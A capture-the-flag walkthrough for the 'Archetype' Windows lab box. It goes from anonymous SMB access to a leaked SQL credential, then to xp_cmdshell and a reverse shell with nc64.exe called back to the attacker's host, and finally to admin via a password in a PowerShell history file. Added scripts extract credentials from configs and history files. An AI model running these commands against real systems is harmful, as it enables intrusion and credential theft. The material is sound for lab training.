Archetype

Task 1: Which TCP port is hosting a database server?

  • Run a quick nmap scan of the target

nmap [Target IP]

Port 1433 is open; that is the default TCP port for Microsoft SQL Server (nmap reports it as ms-sql-s), so the database server is Microsoft SQL Server.

Task 2: What is the name of the non-Administrative share available over SMB?

  • Run the following command

smbclient -N -L \\\\[Target IP]\\
  • -N suppresses the password prompt, so the listing is attempted as a null session

  • -L lists the shares the server offers

Shares whose names end in $ (ADMIN$, C$, IPC$) are the default administrative shares, so the non-administrative share is backups.

Task 3: What is the password identified in the file on the SMB share?

  • The backups share allows anonymous access, so a made-up username with an empty password is enough to connect.

  • Run the following and press enter when prompted for a password.

smbclient \\\\[Target IP]\\backups -U Anonymous
  • The share holds a single file, prod.dtsConfig (an SSIS package configuration file). Run the following to download it to your host machine.

get prod.dtsConfig
  • Read the file with cat.

  • The connection string in the file contains the password M3g4c0rp123 for the user sql_svc on the host ARCHETYPE.
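Reading the password out of the file by eye works for one file, but a connection string is just a ';'-separated list of key=value pairs, so it can be parsed. The following is an added example (not code from the original write-up) that pulls every <ConfiguredValue> out of a .dtsConfig and reports the User ID / Password pairs. The sample file is constructed to resemble an SSIS package configuration and is not the file from the box; the credential values are the ones identified above.

```sh
#!/bin/sh
# Added example: extract credentials from an SSIS package configuration (.dtsConfig).
# Such files carry an OLE DB connection string inside a <ConfiguredValue> element,
# and the connection string is a ';'-separated list of key=value pairs.

# Constructed sample in the shape of a .dtsConfig (not the real file from the box).
SAMPLE_DTSCONFIG='<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="ARCHETYPE\sql_svc" GeneratedFromPackageName="Package"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>'

# Print every <ConfiguredValue> in the file, one per line.
dts_configured_values() {
    grep -o '<ConfiguredValue>[^<]*</ConfiguredValue>' "$1" |
        sed 's#^<ConfiguredValue>##; s#</ConfiguredValue>$##'
}

# Print the value for one key of a ';'-separated connection string. The key match is
# case-insensitive (SQL Server connection string keys are); prints nothing if absent.
# A value may itself contain '=', so only the first '=' on the pair is stripped.
connstr_get() {
    printf '%s\n' "$1" | tr ';' '\n' |
        awk -F= -v want="$2" 'tolower($1) == tolower(want) { sub(/^[^=]*=/, ""); print; exit }'
}

# Report "user<TAB>password" for each connection string in a .dtsConfig that embeds a password.
dts_credentials() {
    dts_configured_values "$1" | while IFS= read -r cs; do
        user=$(connstr_get "$cs" 'User ID')
        pass=$(connstr_get "$cs" 'Password')
        # Connection strings using integrated auth carry no password; skip them.
        [ -n "$pass" ] && printf '%s\t%s\n' "$user" "$pass"
    done
}

# Self-contained demo: write the constructed sample to a temp file and run the extractor on it.
demo_dts_credentials() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_DTSCONFIG" > "$tmp"
    dts_credentials "$tmp"
    rm -f "$tmp"
}

demo_dts_credentials
```

On the real file, run `dts_credentials prod.dtsConfig` after downloading it with smbclient; the same connstr_get helper also works on connection strings found in web.config or appsettings files.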

Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

  • On Kali the Impacket example scripts live in the directory below (the same scripts are also on PATH with an impacket- prefix, e.g. impacket-mssqlclient).

/usr/share/doc/python3-impacket/examples
  • The script that establishes an authenticated connection to a Microsoft SQL Server is mssqlclient.py

Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

  • Run the following to connect with the credentials recovered in the previous task.

python3 mssqlclient.py ARCHETYPE/sql_svc@[Target IP] -windows-auth
  • -windows-auth makes the client use Windows authentication (NTLM) instead of SQL Server authentication; sql_svc is a Windows account, which is why the flag is needed.

  • Then run:

help
  • This lists the client's built-in commands. Among them is xp_cmdshell, the extended stored procedure that hands a command line to cmd.exe and returns its output.

Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

  • Similar to linPEAS on Linux, winPEAS enumerates a Windows host for privilege escalation paths. Download the winPEAS executable (winPEASx64.exe) from the releases page of the PEASS-ng project on GitHub.

Task 7: What file contains the administrator's password?


  • First enable xp_cmdshell. enable_xp_cmdshell is an mssqlclient helper that runs the sp_configure statements to turn the option on; it needs a login with sysadmin (or serveradmin) rights, which sql_svc has on this box.

enable_xp_cmdshell
  • Now commands can be run through xp_cmdshell:

xp_cmdshell [CMD]
  • Each command is passed to cmd.exe. To run PowerShell instead, use this form:

xp_cmdshell "powershell -c [Command]"
  • -c (short for -Command) makes powershell.exe run the supplied command string and exit.

  • xp_cmdshell runs as the SQL Server service account and starts in the system directory (C:\Windows\system32), which only administrators can write to, so downloads have to go somewhere the sql_svc user owns.

  • The user's own Downloads folder is writable. This directory should be:

C:\Users\sql_svc\Downloads
  • Next, fetch a 64-bit Windows netcat binary, nc64.exe; run on the target with -e it gives us a reverse shell.

  • Start a python web server in the directory holding nc64.exe (binding port 80 needs root, so run it with sudo or pick a port above 1023 and adjust the URLs below).

python3 -m http.server 80
  • Download nc64.exe from the web server onto the target with the following command (wget is PowerShell's alias for Invoke-WebRequest):

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://[Host IP]/nc64.exe -outfile nc64.exe"
  • Verify the transfer by checking the web server's output for a GET /nc64.exe with status 200.

  • Start a netcat listener on port 443, which the reverse shell will connect back to:

nc -lvnp 443
  • Run nc64.exe from the Downloads folder on the target, pointing it at your host and the listener port ([Host IP] is your VPN address; it was 10.10.15.41 in the original run):

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe [Host IP] 443"
  • Check the netcat listener: you should now have a reverse shell on the target as sql_svc.
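The "check the web server" step above can be done from the lines that python3 -m http.server prints rather than by eye. The following is an added example (not code from the original write-up) that parses those lines, confirms the target pulled the payload with a 200, and lists any other address that touched the server while the directory was exposed. The sample log lines are constructed in http.server's format with placeholder addresses; the file name srv.log and the addresses are assumptions.

```sh
#!/bin/sh
# Added example: confirm that the target fetched a staged payload, using the log
# lines that `python3 -m http.server` prints. Capture them with something like
#   python3 -m http.server 80 2>&1 | tee srv.log
# and point the functions below at srv.log.

# Constructed sample log in http.server's format; the addresses are placeholders,
# not the real target or VPN addresses.
SAMPLE_HTTP_LOG='10.10.10.27 - - [16/Mar/2021 10:22:33] "GET /nc64.exe HTTP/1.1" 200 -
10.10.10.27 - - [16/Mar/2021 10:22:41] code 404, message File not found
10.10.10.27 - - [16/Mar/2021 10:22:41] "GET /winPEASx64.exe HTTP/1.1" 404 -
10.10.10.27 - - [16/Mar/2021 10:23:05] "GET /winPEASx64.exe HTTP/1.1" 200 -
10.10.14.99 - - [16/Mar/2021 10:23:50] "GET /nc64.exe HTTP/1.1" 200 -'

# Print "client path status" for every request line; other lines (for example the
# "code 404, message ..." diagnostics) are skipped.
http_log_requests() {
    awk '$6 == "\"GET" || $6 == "\"HEAD" || $6 == "\"POST" { print $1, $7, $9 }' "$1"
}

# Return 0 if CLIENT fetched PATH with HTTP 200 at least once, 1 otherwise.
# Usage: payload_fetched LOG CLIENT_IP /path/as/requested
payload_fetched() {
    http_log_requests "$1" |
        awk -v c="$2" -v p="$3" '$1 == c && $2 == p && $3 == "200" { found = 1 } END { exit !found }'
}

# List every client address other than TARGET that hit the server. The directory is
# served to anyone who can reach the port, so another address grabbing the payload
# is worth noticing.
unexpected_clients() {
    http_log_requests "$1" | awk -v t="$2" '$1 != t { print $1 }' | sort -u
}

# Self-contained demo against the constructed log.
demo_http_log() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_HTTP_LOG" > "$tmp"
    if payload_fetched "$tmp" 10.10.10.27 /nc64.exe; then
        echo "nc64.exe delivered to 10.10.10.27"
    else
        echo "nc64.exe NOT delivered to 10.10.10.27"
    fi
    echo "other clients seen: $(unexpected_clients "$tmp" 10.10.10.27 | tr '\n' ' ')"
    rm -f "$tmp"
}

demo_http_log
```

During the real run, `payload_fetched srv.log [Target IP] /nc64.exe` before starting the listener saves a round trip when the PowerShell one-liner silently failed (a 404 from a typo in the file name looks the same from the SQL side as a success).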

  • Now that we have an interactive shell on the target, download winPEAS and run it there.

  • Download winPEASx64.exe to your host machine into the folder the python web server is still serving.

  • In the reverse shell, change to the Downloads folder, which the current user can write to.

cd C:\Users\sql_svc\Downloads
  • Run the following to switch to PowerShell for the remaining commands.

powershell
  • Download winPEAS to the target from the python web server.

wget http://[Host IP]/winPEASx64.exe -outfile winPEASx64.exe
  • Run winPEAS. It enumerates the machine for possible privilege escalation paths and other useful information.

.\winPEASx64.exe
  • Near the end of its output winPEAS lists files it considers interesting.

  • The answer to this task is ConsoleHost_history.txt

Capture User Flag:

  • The flag is in C:\Users\sql_svc\Desktop\user.txt . Run the following to view it.

type C:\Users\sql_svc\Desktop\user.txt

Capture Root Flag:

  • The winPEAS output shows that SeImpersonatePrivilege is enabled for the current user.

  • This can be exploited with JuicyPotato to obtain a SYSTEM shell.

  • Before that, check ConsoleHost_history.txt, PSReadline's equivalent of .bash_history on Linux: it records past PowerShell commands, which may include credentials typed on the command line.

  • View it with type (the full path works from any directory):

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • The history contains a command that was run with the administrator's credentials on the command line; the password is MEGACORP_4dm1n!!
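A history file can be long, so it helps to grep it for the command shapes that carry a password on the command line (net use /user:, runas, sqlcmd -P, ConvertTo-SecureString -AsPlainText, password= in connection strings). The following is an added example (not code from the original write-up) that does that search and also pulls the user/password pair out of a net use line. The sample history is constructed for the demo, not the real file from the box; copy the real file back over the reverse shell or run the same patterns with Select-String on the target.

```sh
#!/bin/sh
# Added example: hunt for credentials in a PSReadline history file
# (ConsoleHost_history.txt). Each line is one command previously typed into
# PowerShell, so a password passed on a command line is stored there in clear text.

# Constructed sample history (not the real file from the box).
SAMPLE_HISTORY='Get-ChildItem C:\backups
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
$s = ConvertTo-SecureString "S3rv1ce!" -AsPlainText -Force
sqlcmd -S . -U sa -P "SaP@ss1"
Get-Service MSSQLSERVER
exit'

# Command shapes that carry a secret on the command line (extended regexes, matched
# case-insensitively). Expect some noise, e.g. any tool taking a bare -p flag.
CRED_PATTERNS='net(\.exe)? +(use|user) .*/user:
/user:[^ ]+ +[^ ]+
-(P|Password|pass)[ =]+
ConvertTo-SecureString
password *=
runas +.*/user:
/p(ass(word)?)?[: ]'

# Print matching history lines prefixed with their line number.
history_cred_lines() {
    # -n numbers lines, -i ignores case, -E extended regex, -f - reads patterns from stdin
    printf '%s\n' "$CRED_PATTERNS" | grep -n -i -E -f - "$1"
}

# For "net use ... /user:NAME PASSWORD" lines, print "NAME PASSWORD".
net_use_creds() {
    grep -i -E 'net(\.exe)? +use ' "$1" |
        sed -n 's#.*/user:\([^ ]*\)  *\([^ ]*\).*#\1 \2#p'
}

# Run a function against the constructed sample written to a temp file.
# Usage: with_sample_history FUNCTION
with_sample_history() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_HISTORY" > "$tmp"
    "$@" "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}

echo "== candidate lines =="
with_sample_history history_cred_lines
echo "== net use credentials =="
with_sample_history net_use_creds
```

The same patterns are worth running over other shell histories found during enumeration (.bash_history, .zsh_history, SQL client histories), which is exactly the class of file winPEAS flags.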

  • Open a new tab on the host machine and use psexec.py from Impacket to log in as administrator. It prompts for the password and drops you into a shell running as SYSTEM.

cd /usr/share/doc/python3-impacket/examples
python3 psexec.py administrator@[Target IP]

  • The root.txt file is on the administrator's desktop. Run the following to view the file.

type C:\Users\Administrator\Desktop\root.txt

  • The flag is b91ccec3305e98240082d4474b848528
